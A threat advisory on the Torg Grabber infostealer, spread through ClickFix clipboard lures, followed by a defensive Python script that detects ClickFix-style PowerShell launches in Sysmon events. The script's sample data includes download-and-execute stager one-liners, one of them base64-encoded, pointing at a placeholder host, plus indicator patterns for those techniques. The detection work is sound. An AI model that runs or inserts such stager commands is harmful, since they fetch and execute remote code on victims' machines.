Infostealer Malware Torg Grabber Harvests Data from 728 Crypto‑Wallet Browser Extensions
What Happened — Researchers at Gen Digital identified a new info-stealer, Torg Grabber, delivered through a ClickFix lure: a web page plants a command on the victim's clipboard and instructs them to paste and run it, which launches malicious PowerShell. The stealer then harvests data from 850 browser extensions, 728 of them cryptocurrency wallets, and exfiltrates credentials, cookies, and private keys over HTTPS to command-and-control (C2) servers fronted by Cloudflare.
Why It Matters for TPRM —
- Third‑party crypto‑wallet extensions are a high‑value attack surface for supply‑chain risk.
- The C2 infrastructure turns over quickly (new servers weekly) and sits behind Cloudflare, so IP- or domain-based blocking lags the attacker; the threat is persistent and can reach any organization whose employees use these extensions.
- Anti-analysis techniques and in-memory execution leave few file artifacts for endpoint tooling to catch, so data loss can go undetected.
Who Is Affected — Financial services (crypto exchanges, custodians), SaaS platforms that integrate with wallet extensions, and any enterprise allowing browser‑based crypto transactions.
Recommended Actions —
- Review and restrict use of browser extensions for crypto wallets and password managers on corporate devices.
- Enforce application allow-list policies (AppLocker or WDAC) and restrict PowerShell for standard users, for example by enforcing Constrained Language Mode and enabling script block logging; disabling PowerShell outright is rarely practical because Windows management tooling depends on it.
- Deploy endpoint detection that flags the ClickFix pattern (a script interpreter such as powershell.exe spawned from explorer.exe via the Run dialog with hidden-window, encoded-command, or download-and-execute flags) as well as reflective loading and direct-syscall activity.
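As an added example (not part of the original advisory or Gen Digital's research), the following Python script shows the detection logic for the ClickFix-to-PowerShell step described under What Happened: it scans Sysmon Event ID 1 (process creation) records for a script interpreter spawned from explorer.exe, i.e. from the Run dialog, carrying hidden-window, encoded-command, or download-and-execute flags, and decodes any -EncodedCommand payload (UTF-16LE base64) so indicators hidden inside it are visible. The event records, the example.invalid URL and the stager one-liner are constructed for illustration; the indicator names and the alert threshold are this example's own choices, not signatures from the report.

```python
import base64
import binascii
import ntpath
import re

# Script hosts a ClickFix lure typically has the victim launch from the Win+R Run box,
# which makes explorer.exe the parent process.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line indicators (names and patterns are this example's own, not vendor signatures).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "remote_fetch": re.compile(r"\b(?:irm|iwr)\b|invoke-restmethod|invoke-webrequest|downloadstring", re.I),
    "clipboard_read": re.compile(r"get-clipboard", re.I),
}
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if absent or not valid base64.

    PowerShell expects the encoded command to be base64 over UTF-16LE text.
    """
    m = ENCODED_ARG.search(command_line)
    if not m:
        return ""
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return ""
    return raw.decode("utf-16le", errors="ignore")


def analyze_event(event: dict) -> dict:
    """Score one Sysmon-style process-creation record for the ClickFix launch pattern."""
    image = ntpath.basename(event.get("Image", "")).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    # Match indicators against the raw command line and the decoded payload together.
    text = cmd + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    run_dialog_launch = parent == "explorer.exe" and image in INTERPRETERS
    # Alert on an interpreter launched from the shell with any stager flag (the ClickFix shape),
    # or on a dense cluster of stager flags regardless of parent. Threshold is an example choice.
    suspicious = (run_dialog_launch and len(hits) >= 1) or len(hits) >= 3
    return {
        "image": image,
        "parent": parent,
        "run_dialog_launch": run_dialog_launch,
        "indicators": hits,
        "decoded": decoded,
        "suspicious": suspicious,
    }


def scan_events(events: list) -> list:
    return [analyze_event(e) for e in events]


# Constructed sample data, not real telemetry. The stager text is a generic
# download-and-execute one-liner pointing at a reserved .invalid domain.
STAGER = "IEX (irm https://example.invalid/verify)"
ENCODED = base64.b64encode(STAGER.encode("utf-16le")).decode()
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {   # benign: an admin runs a cmdlet from an interactive cmd.exe console
        "Image": PS_PATH, "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "powershell.exe Get-Process | Sort-Object CPU",
    },
    {   # benign: a plain interactive launch from the Start menu (explorer parent, no stager flags)
        "Image": PS_PATH, "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": f'"{PS_PATH}"',
    },
    {   # ClickFix: pasted into Win+R, hidden window, encoded stager
        "Image": PS_PATH, "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": f"powershell -w hidden -nop -enc {ENCODED}",
    },
    {   # ClickFix variant: plain-text download-and-execute, numeric window style
        "Image": PS_PATH, "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -w 1 -c "iex (iwr https://example.invalid/fix -UseBasicParsing).Content"',
    },
]

if __name__ == "__main__":
    for r in scan_events(SAMPLE_EVENTS):
        flag = "ALERT" if r["suspicious"] else "ok   "
        print(f'{flag} {r["parent"]} -> {r["image"]} {r["indicators"]}')
```

The second sample shows why the parent-process check alone is not enough: an interactive launch from the Start menu also has explorer.exe as parent, so the rule requires at least one stager flag on top of it. For forensic follow-up on a suspected ClickFix host, the command the user pasted is usually still recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth pulling alongside the process-creation event. The "three indicators regardless of parent" branch will fire on some legitimate scheduled-task scripts that use -nop -ep bypass -w hidden; tune it against your own baseline.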
Technical Notes — Initial access via ClickFix clipboard lure → malicious PowerShell. Exfiltration uses HTTPS to Cloudflare-fronted C2 servers. The malware employs direct syscalls, reflective loading, multi-layer obfuscation, and an App-Bound Encryption bypass to steal Chrome/Edge/Brave/Opera cookies. A separate tool, “Underground”, extracts the browsers' master encryption keys through the COM elevation service that App-Bound Encryption relies on. No public CVE applies; this is a custom, actively developed infostealer rather than an exploit of a known vulnerability. Source: BleepingComputer